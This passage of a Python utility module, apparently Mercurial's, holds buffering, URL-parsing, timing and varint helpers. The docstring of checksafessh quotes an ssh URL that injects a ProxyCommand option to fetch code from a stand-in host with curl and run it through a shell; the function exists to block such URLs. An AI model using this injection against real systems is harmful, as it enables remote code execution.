            # queue. Our code below avoids this overhead.

            chunk = queue[0]
            chunkl = len(chunk)
            offset = self._chunkoffset

            # Use full chunk.
            if offset == 0 and left >= chunkl:
                left -= chunkl
                queue.popleft()
                buf.append(chunk)
                # self._chunkoffset remains at 0.
                continue

            chunkremaining = chunkl - offset

            # Use all of unconsumed part of chunk.
            if left >= chunkremaining:
                left -= chunkremaining
                queue.popleft()
                # offset == 0 is enabled by block above, so this won't merely
                # copy via ``chunk[0:]``.
                buf.append(chunk[offset:])
                self._chunkoffset = 0

            # Partial chunk needed.
            else:
                buf.append(chunk[offset:offset + left])
                self._chunkoffset += left
                left -= chunkremaining

        return ''.join(buf)

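# A minimal sketch of the resegmentation behaviour (hypothetical chunks):
# reads may span chunk boundaries, consume chunks partially via
# _chunkoffset, and return short when the iterator runs dry.
def _chunkbuffersketch():
    cb = chunkbuffer(iter([b'abc', b'defg', b'h']))
    assert cb.read(2) == b'ab'    # partial first chunk, offset advances
    assert cb.read(4) == b'cdef'  # drains 'abc', bites into 'defg'
    assert cb.read(6) == b'gh'    # short read: only 2 bytes were left
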
def filechunkiter(f, size=131072, limit=None):
    """Create a generator that produces the data in the file size
    (default 131072) bytes at a time, up to optional limit (default is
    to read all data). Chunks may be less than size bytes if the
    chunk is the last chunk in the file, or the file is a socket or
    some other type of file that sometimes reads less data than is
    requested."""
    assert size >= 0
    assert limit is None or limit >= 0
    while True:
        if limit is None:
            nbytes = size
        else:
            nbytes = min(limit, size)
        s = nbytes and f.read(nbytes)
        if not s:
            break
        if limit:
            limit -= len(s)
        yield s

class cappedreader(object):
    """A file object proxy that allows reading up to N bytes.

    Given a source file object, instances of this type allow reading up to
    N bytes from that source file object. Attempts to read past the allowed
    limit are treated as EOF.

    It is assumed that I/O is not performed on the original file object
    in addition to I/O that is performed by this instance. If there is,
    state tracking will get out of sync and unexpected results will ensue.
    """
    def __init__(self, fh, limit):
        """Allow reading up to <limit> bytes from <fh>."""
        self._fh = fh
        self._left = limit

    def read(self, n=-1):
        if not self._left:
            return b''

        if n < 0:
            n = self._left

        data = self._fh.read(min(n, self._left))
        self._left -= len(data)
        assert self._left >= 0

        return data

    def readinto(self, b):
        res = self.read(len(b))
        if res is None:
            return None

        b[0:len(res)] = res
        return len(res)

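# A minimal usage sketch (io.BytesIO stands in for a real stream): the cap
# behaves exactly like EOF, so frame-oriented callers can read() freely
# without overrunning into the next frame.
def _cappedreadersketch():
    import io
    fh = io.BytesIO(b'0123456789')
    r = cappedreader(fh, 4)
    assert r.read() == b'0123'  # n=-1 is clamped to the remaining cap
    assert r.read() == b''      # at the cap: EOF
    assert fh.read(2) == b'45'  # the source advanced only 4 bytes
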
def unitcountfn(*unittable):
    '''return a function that renders a readable count of some quantity'''

    def go(count):
        for multiplier, divisor, format in unittable:
            if abs(count) >= divisor * multiplier:
                return format % (count / float(divisor))
        return unittable[-1][2] % count

    return go

def processlinerange(fromline, toline):
    """Check that linerange <fromline>:<toline> makes sense and return a
    0-based range.

    >>> processlinerange(10, 20)
    (9, 20)
    >>> processlinerange(2, 1)
    Traceback (most recent call last):
      ...
    ParseError: line range must be positive
    >>> processlinerange(0, 5)
    Traceback (most recent call last):
      ...
    ParseError: fromline must be strictly positive
    """
    if toline - fromline < 0:
        raise error.ParseError(_("line range must be positive"))
    if fromline < 1:
        raise error.ParseError(_("fromline must be strictly positive"))
    return fromline - 1, toline

bytecount = unitcountfn(
    (100, 1 << 30, _('%.0f GB')),
    (10, 1 << 30, _('%.1f GB')),
    (1, 1 << 30, _('%.2f GB')),
    (100, 1 << 20, _('%.0f MB')),
    (10, 1 << 20, _('%.1f MB')),
    (1, 1 << 20, _('%.2f MB')),
    (100, 1 << 10, _('%.0f KB')),
    (10, 1 << 10, _('%.1f KB')),
    (1, 1 << 10, _('%.2f KB')),
    (1, 1, _('%.0f bytes')),
    )

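# A minimal sketch of how the unit table resolves (values checked against
# the thresholds above): the first row whose multiplier * divisor does not
# exceed abs(count) wins, so precision drops as magnitude grows.
def _bytecountsketch():
    assert bytecount(987) == _('%.0f bytes') % 987           # '987 bytes'
    assert bytecount(150 * (1 << 10)) == _('%.0f KB') % 150  # >= 100 KB
    assert bytecount(15 * (1 << 20)) == _('%.1f MB') % 15    # >= 10 MB
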
class transformingwriter(object):
    """Writable file wrapper to transform data by function"""

    def __init__(self, fp, encode):
        self._fp = fp
        self._encode = encode

    def close(self):
        self._fp.close()

    def flush(self):
        self._fp.flush()

    def write(self, data):
        return self._fp.write(self._encode(data))

# Matches a single EOL which can either be a CRLF where repeated CR
# are removed or a LF. We do not care about old Macintosh files, so a
# stray CR is an error.
_eolre = remod.compile(br'\r*\n')

def tolf(s):
    return _eolre.sub('\n', s)

def tocrlf(s):
    return _eolre.sub('\r\n', s)

def _crlfwriter(fp):
    return transformingwriter(fp, tocrlf)

if pycompat.oslinesep == '\r\n':
    tonativeeol = tocrlf
    fromnativeeol = tolf
    nativeeolwriter = _crlfwriter
else:
    tonativeeol = pycompat.identity
    fromnativeeol = pycompat.identity
    nativeeolwriter = pycompat.identity

if (pyplatform.python_implementation() == 'CPython' and
    sys.version_info < (3, 0)):
    # There is an issue in CPython that some IO methods do not handle EINTR
    # correctly. The following table shows what CPython version (and functions)
    # are affected (buggy: has the EINTR bug, okay: otherwise):
    #
    #             | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
    # --------------------------------------------------
    # fp.__iter__ | buggy   | buggy           | okay
    # fp.read*    | buggy   | okay [1]        | okay
    #
    # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
    #
    # Here we work around the EINTR issue for fileobj.__iter__. Other methods
    # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
    #
    # Although we can work around the EINTR issue for fp.__iter__, it is
    # slower: "for x in fp" is 4x faster than "for x in iter(fp.readline, '')"
    # in CPython 2, because CPython 2 maintains an internal readahead buffer
    # for fp.__iter__ but not other fp.read* methods.
    #
    # On modern systems like Linux, the "read" syscall cannot be interrupted
    # when reading "fast" files like on-disk files. So the EINTR issue only
    # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
    # files approximately as "fast" files and use the fast (unsafe) code path,
    # to minimize the performance impact.
    if sys.version_info >= (2, 7, 4):
        # fp.readline deals with EINTR correctly, use it as a workaround.
        def _safeiterfile(fp):
            return iter(fp.readline, '')
    else:
        # fp.read* are broken too, manually deal with EINTR in a stupid way.
        # note: this may block longer than necessary because of bufsize.
        def _safeiterfile(fp, bufsize=4096):
            fd = fp.fileno()
            line = ''
            while True:
                try:
                    buf = os.read(fd, bufsize)
                except OSError as ex:
                    # os.read only raises EINTR before any data is read
                    if ex.errno == errno.EINTR:
                        continue
                    else:
                        raise
                line += buf
                if '\n' in buf:
                    splitted = line.splitlines(True)
                    line = ''
                    for l in splitted:
                        if l[-1] == '\n':
                            yield l
                        else:
                            line = l
                if not buf:
                    break
            if line:
                yield line

    def iterfile(fp):
        fastpath = True
        if type(fp) is file:
            fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
        if fastpath:
            return fp
        else:
            return _safeiterfile(fp)
else:
    # PyPy and CPython 3 do not have the EINTR issue, so no workaround is
    # needed.
    def iterfile(fp):
        return fp

def iterlines(iterator):
    for chunk in iterator:
        for line in chunk.splitlines():
            yield line

def expandpath(path):
    return os.path.expanduser(os.path.expandvars(path))

def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
    """Return the result of interpolating items in the mapping into string s.

    prefix is a single character string, or a two character string with
    a backslash as the first character if the prefix needs to be escaped in
    a regular expression.

    fn is an optional function that will be applied to the replacement text
    just before replacement.

    escape_prefix is an optional flag that allows using a doubled prefix to
    escape it.
    """
    fn = fn or (lambda s: s)
    patterns = '|'.join(mapping.keys())
    if escape_prefix:
        patterns += '|' + prefix
        if len(prefix) > 1:
            prefix_char = prefix[1:]
        else:
            prefix_char = prefix
        mapping[prefix_char] = prefix_char
    r = remod.compile(br'%s(%s)' % (prefix, patterns))
    return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)

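# A minimal usage sketch (hypothetical mapping): with escape_prefix=True and
# the regex-escaped prefix br'\%', a doubled '%%' collapses to a literal '%'
# while '%user' is replaced through the mapping.
def _interpolatesketch():
    mapping = {b'user': b'joe'}
    return interpolate(br'\%', mapping, b'hi %user, 100%%',
                       escape_prefix=True)  # -> b'hi joe, 100%'
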
def getport(port):
    """Return the port for a given network service.

    If port is an integer, it's returned as is. If it's a string, it's
    looked up using socket.getservbyname(). If there's no matching
    service, error.Abort is raised.
    """
    try:
        return int(port)
    except ValueError:
        pass

    try:
        return socket.getservbyname(pycompat.sysstr(port))
    except socket.error:
        raise error.Abort(_("no port number associated with service '%s'")
                          % port)

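# A minimal sketch of the two lookup paths (assumes the local services
# database knows 'http'): numeric strings short-circuit through int(),
# anything else goes to socket.getservbyname().
def _getportsketch():
    assert getport(b'8080') == 8080
    assert getport(b'http') == 80  # via getservbyname(); aborts if unknown
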
class url(object):
    r"""Reliable URL parser.

    This parses URLs and provides attributes for the following
    components:

    <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>

    Missing components are set to None. The only exception is
    fragment, which is set to '' if present but empty.

    If parsefragment is False, fragment is included in query. If
    parsequery is False, query is included in path. If both are
    False, both fragment and query are included in path.

    See http://www.ietf.org/rfc/rfc2396.txt for more information.

    Note that for backward compatibility reasons, bundle URLs do not
    take host names. That means 'bundle://../' has a path of '../'.

    Examples:

    >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
    <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
    >>> url(b'ssh://[::1]:2200//home/joe/repo')
    <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
    >>> url(b'file:///home/joe/repo')
    <url scheme: 'file', path: '/home/joe/repo'>
    >>> url(b'file:///c:/temp/foo/')
    <url scheme: 'file', path: 'c:/temp/foo/'>
    >>> url(b'bundle:foo')
    <url scheme: 'bundle', path: 'foo'>
    >>> url(b'bundle://../foo')
    <url scheme: 'bundle', path: '../foo'>
    >>> url(br'c:\foo\bar')
    <url path: 'c:\\foo\\bar'>
    >>> url(br'\\blah\blah\blah')
    <url path: '\\\\blah\\blah\\blah'>
    >>> url(br'\\blah\blah\blah#baz')
    <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
    >>> url(br'file:///C:\users\me')
    <url scheme: 'file', path: 'C:\\users\\me'>

    Authentication credentials:

    >>> url(b'ssh://joe:xyz@x/repo')
    <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
    >>> url(b'ssh://joe@x/repo')
    <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>

    Query strings and fragments:

    >>> url(b'http://host/a?b#c')
    <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
    >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
    <url scheme: 'http', host: 'host', path: 'a?b#c'>

    Empty path:

    >>> url(b'')
    <url path: ''>
    >>> url(b'#a')
    <url path: '', fragment: 'a'>
    >>> url(b'http://host/')
    <url scheme: 'http', host: 'host', path: ''>
    >>> url(b'http://host/#a')
    <url scheme: 'http', host: 'host', path: '', fragment: 'a'>

    Only scheme:

    >>> url(b'http:')
    <url scheme: 'http'>
    """

    _safechars = "!~*'()+"
    _safepchars = "/!~*'()+:\\"
    _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match

    def __init__(self, path, parsequery=True, parsefragment=True):
        # We slowly chomp away at path until we have only the path left
        self.scheme = self.user = self.passwd = self.host = None
        self.port = self.path = self.query = self.fragment = None
        self._localpath = True
        self._hostport = ''
        self._origpath = path

        if parsefragment and '#' in path:
            path, self.fragment = path.split('#', 1)

        # special case for Windows drive letters and UNC paths
        if hasdriveletter(path) or path.startswith('\\\\'):
            self.path = path
            return

        # For compatibility reasons, we can't handle bundle paths as
        # normal URLs
        if path.startswith('bundle:'):
            self.scheme = 'bundle'
            path = path[7:]
            if path.startswith('//'):
                path = path[2:]
            self.path = path
            return

        if self._matchscheme(path):
            parts = path.split(':', 1)
            if parts[0]:
                self.scheme, path = parts
                self._localpath = False

        if not path:
            path = None
            if self._localpath:
                self.path = ''
                return
        else:
            if self._localpath:
                self.path = path
                return

        if parsequery and '?' in path:
            path, self.query = path.split('?', 1)
            if not path:
                path = None
            if not self.query:
                self.query = None

        # // is required to specify a host/authority
        if path and path.startswith('//'):
            parts = path[2:].split('/', 1)
            if len(parts) > 1:
                self.host, path = parts
            else:
                self.host = parts[0]
                path = None
            if not self.host:
                self.host = None
                # path of file:///d is /d
                # path of file:///d:/ is d:/, not /d:/
                if path and not hasdriveletter(path):
                    path = '/' + path

        if self.host and '@' in self.host:
            self.user, self.host = self.host.rsplit('@', 1)
            if ':' in self.user:
                self.user, self.passwd = self.user.split(':', 1)
            if not self.host:
                self.host = None

        # Don't split on colons in IPv6 addresses without ports
        if (self.host and ':' in self.host and
            not (self.host.startswith('[') and self.host.endswith(']'))):
            self._hostport = self.host
            self.host, self.port = self.host.rsplit(':', 1)
            if not self.host:
                self.host = None

        if (self.host and self.scheme == 'file' and
            self.host not in ('localhost', '127.0.0.1', '[::1]')):
            raise error.Abort(_('file:// URLs can only refer to localhost'))

        self.path = path

        # leave the query string escaped
        for a in ('user', 'passwd', 'host', 'port',
                  'path', 'fragment'):
            v = getattr(self, a)
            if v is not None:
                setattr(self, a, urlreq.unquote(v))

    @encoding.strmethod
    def __repr__(self):
        attrs = []
        for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
                  'query', 'fragment'):
            v = getattr(self, a)
            if v is not None:
                attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
        return '<url %s>' % ', '.join(attrs)

    def __bytes__(self):
        r"""Join the URL's components back into a URL string.

        Examples:

        >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
        'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
        'http://user:pw@host:80/?foo=bar&baz=42'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
        'http://user:pw@host:80/?foo=bar%3dbaz'
        >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
        'ssh://user:pw@[::1]:2200//home/joe#'
        >>> bytes(url(b'http://localhost:80//'))
        'http://localhost:80//'
        >>> bytes(url(b'http://localhost:80/'))
        'http://localhost:80/'
        >>> bytes(url(b'http://localhost:80'))
        'http://localhost:80/'
        >>> bytes(url(b'bundle:foo'))
        'bundle:foo'
        >>> bytes(url(b'bundle://../foo'))
        'bundle:../foo'
        >>> bytes(url(b'path'))
        'path'
        >>> bytes(url(b'file:///tmp/foo/bar'))
        'file:///tmp/foo/bar'
        >>> bytes(url(b'file:///c:/tmp/foo/bar'))
        'file:///c:/tmp/foo/bar'
        >>> print(url(br'bundle:foo\bar'))
        bundle:foo\bar
        >>> print(url(br'file:///D:\data\hg'))
        file:///D:\data\hg
        """
        if self._localpath:
            s = self.path
            if self.scheme == 'bundle':
                s = 'bundle:' + s
            if self.fragment:
                s += '#' + self.fragment
            return s

        s = self.scheme + ':'
        if self.user or self.passwd or self.host:
            s += '//'
        elif self.scheme and (not self.path or self.path.startswith('/')
                              or hasdriveletter(self.path)):
            s += '//'
            if hasdriveletter(self.path):
                s += '/'
        if self.user:
            s += urlreq.quote(self.user, safe=self._safechars)
        if self.passwd:
            s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
        if self.user or self.passwd:
            s += '@'
        if self.host:
            if not (self.host.startswith('[') and self.host.endswith(']')):
                s += urlreq.quote(self.host)
            else:
                s += self.host
            if self.port:
                s += ':' + urlreq.quote(self.port)
        if self.host:
            s += '/'
        if self.path:
            # TODO: similar to the query string, we should not unescape the
            # path when we store it, the path might contain '%2f' = '/',
            # which we should *not* escape.
            s += urlreq.quote(self.path, safe=self._safepchars)
        if self.query:
            # we store the query in escaped form.
            s += '?' + self.query
        if self.fragment is not None:
            s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
        return s

    __str__ = encoding.strmethod(__bytes__)

    def authinfo(self):
        user, passwd = self.user, self.passwd
        try:
            self.user, self.passwd = None, None
            s = bytes(self)
        finally:
            self.user, self.passwd = user, passwd
        if not self.user:
            return (s, None)
        # authinfo[1] is passed to urllib2 password manager, and its
        # URIs must not contain credentials. The host is passed in the
        # URIs list because Python < 2.4.3 uses only that to search for
        # a password.
        return (s, (None, (s, self.host),
                    self.user, self.passwd or ''))

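    # A hedged illustration of authinfo() with made-up credentials: the
    # returned URI has the user/password stripped, while element [1] carries
    # what the urllib2 password manager needs:
    #
    #   url(b'http://joe:xyz@example.com/repo').authinfo()
    #   # -> ('http://example.com/repo',
    #   #     (None, ('http://example.com/repo', 'example.com'),
    #   #      'joe', 'xyz'))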
    def isabs(self):
        if self.scheme and self.scheme != 'file':
            return True # remote URL
        if hasdriveletter(self.path):
            return True # absolute for our purposes - can't be joined()
        if self.path.startswith(br'\\'):
            return True # Windows UNC path
        if self.path.startswith('/'):
            return True # POSIX-style
        return False

    def localpath(self):
        if self.scheme == 'file' or self.scheme == 'bundle':
            path = self.path or '/'
            # For Windows, we need to promote hosts containing drive
            # letters to paths with drive letters.
            if hasdriveletter(self._hostport):
                path = self._hostport + '/' + self.path
            elif (self.host is not None and self.path
                  and not hasdriveletter(path)):
                path = '/' + path
            return path
        return self._origpath

    def islocal(self):
        '''whether localpath will return something that posixfile can open'''
        return (not self.scheme or self.scheme == 'file'
                or self.scheme == 'bundle')

def hasscheme(path):
    return bool(url(path).scheme)

def hasdriveletter(path):
    return path and path[1:2] == ':' and path[0:1].isalpha()

def urllocalpath(path):
    return url(path, parsequery=False, parsefragment=False).localpath()

def checksafessh(path):
    """check if a path / url is a potentially unsafe ssh exploit (SEC)

    This is a sanity check for ssh urls. ssh will parse the first item as
    an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
    Let's prevent these potentially exploitable urls entirely and warn the
    user.

    Raises an error.Abort when the url is unsafe.
    """
    path = urlreq.unquote(path)
    if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
        raise error.Abort(_('potentially unsafe url: %r') %
                          (pycompat.bytestr(path),))

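# A hedged illustration of the check above (byte literals follow this
# module's conventions):
#
#   checksafessh(b'ssh://example.com/repo')    # returns quietly
#   checksafessh(b'ssh://-oProxyCommand=x/p')  # raises error.Abort
#   checksafessh(b'ssh://%2DoProxyCommand=x')  # also aborts: the path is
#                                              # unquoted before checking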
def hidepassword(u):
    '''hide user credential in a url string'''
    u = url(u)
    if u.passwd:
        u.passwd = '***'
    return bytes(u)

def removeauth(u):
    '''remove all authentication information from a url string'''
    u = url(u)
    u.user = u.passwd = None
    return bytes(u)

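# A hedged example with made-up credentials:
#
#   hidepassword(b'http://joe:xyz@example.com/repo')
#   # -> 'http://joe:***@example.com/repo'
#   removeauth(b'http://joe:xyz@example.com/repo')
#   # -> 'http://example.com/repo'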
timecount = unitcountfn(
    (1, 1e3, _('%.0f s')),
    (100, 1, _('%.1f s')),
    (10, 1, _('%.2f s')),
    (1, 1, _('%.3f s')),
    (100, 0.001, _('%.1f ms')),
    (10, 0.001, _('%.2f ms')),
    (1, 0.001, _('%.3f ms')),
    (100, 0.000001, _('%.1f us')),
    (10, 0.000001, _('%.2f us')),
    (1, 0.000001, _('%.3f us')),
    (100, 0.000000001, _('%.1f ns')),
    (10, 0.000000001, _('%.2f ns')),
    (1, 0.000000001, _('%.3f ns')),
    )

@attr.s
class timedcmstats(object):
    """Stats information produced by the timedcm context manager on entering."""

    # the starting value of the timer as a float (meaning and resolution are
    # platform dependent, see util.timer)
    start = attr.ib(default=attr.Factory(lambda: timer()))
    # the number of seconds as a floating point value; starts at 0, updated
    # when the context is exited.
    elapsed = attr.ib(default=0)
    # the number of nested timedcm context managers.
    level = attr.ib(default=1)

    def __bytes__(self):
        return timecount(self.elapsed) if self.elapsed else '<unknown>'

    __str__ = encoding.strmethod(__bytes__)

@contextlib.contextmanager
def timedcm(whencefmt, *whenceargs):
    """A context manager that produces timing information for a given context.

    On entering, a timedcmstats instance is produced.

    This context manager is reentrant.

    """
    # track nested context managers
    timedcm._nested += 1
    timing_stats = timedcmstats(level=timedcm._nested)
    try:
        with tracing.log(whencefmt, *whenceargs):
            yield timing_stats
    finally:
        timing_stats.elapsed = timer() - timing_stats.start
        timedcm._nested -= 1

timedcm._nested = 0

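# A hedged usage sketch; 'checkout' here is only an illustrative label:
#
#   with timedcm('perfblock %s', 'checkout') as stats:
#       do_expensive_work()
#   # stats.elapsed now holds the wall time in seconds, and bytes(stats)
#   # renders it human-readably via timecount(), e.g. '1.23 s'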
def timed(func):
    '''Report the execution time of a function call to stderr.

    During development, use as a decorator when you need to measure
    the cost of a function, e.g. as follows:

      @util.timed
      def foo(a, b, c):
          pass
    '''

    def wrapper(*args, **kwargs):
        with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
            result = func(*args, **kwargs)
        stderr = procutil.stderr
        stderr.write('%s%s: %s\n' % (
            ' ' * time_stats.level * 2, pycompat.bytestr(func.__name__),
            time_stats))
        return result
    return wrapper

_sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
              ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))

def sizetoint(s):
    '''Convert a space specifier to a byte count.

    >>> sizetoint(b'30')
    30
    >>> sizetoint(b'2.2kb')
    2252
    >>> sizetoint(b'6M')
    6291456
    '''
    t = s.strip().lower()
    try:
        for k, u in _sizeunits:
            if t.endswith(k):
                return int(float(t[:-len(k)]) * u)
        return int(t)
    except ValueError:
        raise error.ParseError(_("couldn't parse size: %s") % s)

class hooks(object):
    '''A collection of hook functions that can be used to extend a
    function's behavior. Hooks are called in lexicographic order,
    based on the names of their sources.'''

    def __init__(self):
        self._hooks = []

    def add(self, source, hook):
        self._hooks.append((source, hook))

    def __call__(self, *args):
        self._hooks.sort(key=lambda x: x[0])
        results = []
        for source, hook in self._hooks:
            results.append(hook(*args))
        return results

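# A hedged example of the ordering contract; the source names are invented:
#
#   h = hooks()
#   h.add('zz-ext', lambda x: x + 1)
#   h.add('aa-ext', lambda x: x * 2)
#   h(3)  # -> [6, 4]: hooks run sorted by source name, not insertion order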
def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
    '''Yields lines for a nicely formatted stacktrace.
    Skips the 'skip' last entries, then returns the last 'depth' entries.
    Each file+linenumber is formatted according to fileline.
    Each line is formatted according to line.
    If line is None, it yields:
      length of longest filepath+line number,
      filepath+linenumber,
      function

    Not to be used in production code, but very convenient while developing.
    '''
    entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
               for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
               ][-depth:]
    if entries:
        fnmax = max(len(entry[0]) for entry in entries)
        for fnln, func in entries:
            if line is None:
                yield (fnmax, fnln, func)
            else:
                yield line % (fnmax, fnln, func)

def debugstacktrace(msg='stacktrace', skip=0,
                    f=procutil.stderr, otherf=procutil.stdout, depth=0):
    '''Writes a message to f (stderr) with a nicely formatted stacktrace.
    Skips the 'skip' entries closest to the call, then shows 'depth' entries.
    By default it will flush stdout first.
    It can be used everywhere and intentionally does not require an ui object.
    Not to be used in production code, but very convenient while developing.
    '''
    if otherf:
        otherf.flush()
    f.write('%s at:\n' % msg.rstrip())
    for line in getstackframes(skip + 1, depth=depth):
        f.write(line)
    f.flush()

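# A hedged usage sketch, e.g. dropped temporarily into a suspect code path:
#
#   debugstacktrace('who called me?', skip=1, depth=5)
#   # writes the message plus the five innermost callers to stderr,
#   # flushing stdout first so the two streams stay readable together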
class dirs(object):
    '''a multiset of directory names from a dirstate or manifest'''

    def __init__(self, map, skip=None):
        self._dirs = {}
        addpath = self.addpath
        if isinstance(map, dict) and skip is not None:
            for f, s in map.iteritems():
                if s[0] != skip:
                    addpath(f)
        elif skip is not None:
            raise error.ProgrammingError("skip character is only supported "
                                         "with a dict source")
        else:
            for f in map:
                addpath(f)

    def addpath(self, path):
        dirs = self._dirs
        for base in finddirs(path):
            if base in dirs:
                dirs[base] += 1
                return
            dirs[base] = 1

    def delpath(self, path):
        dirs = self._dirs
        for base in finddirs(path):
            if dirs[base] > 1:
                dirs[base] -= 1
                return
            del dirs[base]

    def __iter__(self):
        return iter(self._dirs)

    def __contains__(self, d):
        return d in self._dirs

if safehasattr(parsers, 'dirs'):
    dirs = parsers.dirs

if rustdirs is not None:
    dirs = rustdirs

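# A hedged illustration of the pure-Python multiset above (the C or Rust
# replacement bound just above is expected to behave the same):
#
#   d = dirs(['a/b/c', 'a/d'])
#   'a' in d      # -> True
#   'a/b' in d    # -> True
#   d.delpath('a/b/c')
#   'a/b' in d    # -> False; 'a' is still present via 'a/d'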
def finddirs(path):
    pos = path.rfind('/')
    while pos != -1:
        yield path[:pos]
        pos = path.rfind('/', 0, pos)
    yield ''


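# A hedged illustration: ancestor directories are yielded deepest-first,
# ending with the root (the empty string), so callers can stop at the first
# hit:
#
#   list(finddirs('a/b/c'))  # -> ['a/b', 'a', '']
#   list(finddirs('top'))    # -> ['']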
# convenient shortcut
dst = debugstacktrace

def safename(f, tag, ctx, others=None):
    """
    Generate a name that it is safe to rename f to in the given context.

    f: filename to rename
    tag: a string tag that will be included in the new name
    ctx: a context, in which the new name must not exist
    others: a set of other filenames that the new name must not be in

    Returns a file name of the form oldname~tag[~number] which does not exist
    in the provided context and is not in the set of other names.
    """
    if others is None:
        others = set()

    fn = '%s~%s' % (f, tag)
    if fn not in ctx and fn not in others:
        return fn
    for n in itertools.count(1):
        fn = '%s~%s~%s' % (f, tag, n)
        if fn not in ctx and fn not in others:
            return fn

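# A hedged example using a plain set as a stand-in for ctx (anything
# supporting the 'in' operator works for illustration):
#
#   safename('foo', 'orig', set(), others={'foo~orig'})
#   # -> 'foo~orig~1', since the unnumbered candidate is already taken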
def readexactly(stream, n):
    '''read n bytes from stream.read and abort if less was available'''
    s = stream.read(n)
    if len(s) < n:
        raise error.Abort(_("stream ended unexpectedly"
                            " (got %d bytes, expected %d)")
                          % (len(s), n))
    return s

def uvarintencode(value):
    """Encode an unsigned integer value to a varint.

    A varint is a variable length integer of 1 or more bytes. Each byte
    except the last has the most significant bit set. The lower 7 bits of
    each byte store the 2's complement representation, least significant group
    first.

    >>> uvarintencode(0)
    '\\x00'
    >>> uvarintencode(1)
    '\\x01'
    >>> uvarintencode(127)
    '\\x7f'
    >>> uvarintencode(1337)
    '\\xb9\\n'
    >>> uvarintencode(65536)
    '\\x80\\x80\\x04'
    >>> uvarintencode(-1)
    Traceback (most recent call last):
        ...
    ProgrammingError: negative value for uvarint: -1
    """
    if value < 0:
        raise error.ProgrammingError('negative value for uvarint: %d'
                                     % value)
    bits = value & 0x7f
    value >>= 7
    bytes = []
    while value:
        bytes.append(pycompat.bytechr(0x80 | bits))
        bits = value & 0x7f
        value >>= 7
    bytes.append(pycompat.bytechr(bits))

    return ''.join(bytes)

def uvarintdecodestream(fh):
    """Decode an unsigned variable length integer from a stream.

    The passed argument is anything that has a ``.read(N)`` method.

    >>> try:
    ...     from StringIO import StringIO as BytesIO
    ... except ImportError:
    ...     from io import BytesIO
    >>> uvarintdecodestream(BytesIO(b'\\x00'))
    0
    >>> uvarintdecodestream(BytesIO(b'\\x01'))
    1
    >>> uvarintdecodestream(BytesIO(b'\\x7f'))
    127
    >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
    1337
    >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
    65536
    >>> uvarintdecodestream(BytesIO(b'\\x80'))
    Traceback (most recent call last):
        ...
    Abort: stream ended unexpectedly (got 0 bytes, expected 1)
    """
    result = 0
    shift = 0
    while True:
        byte = ord(readexactly(fh, 1))
        result |= ((byte & 0x7f) << shift)
        if not (byte & 0x80):
            return result
        shift += 7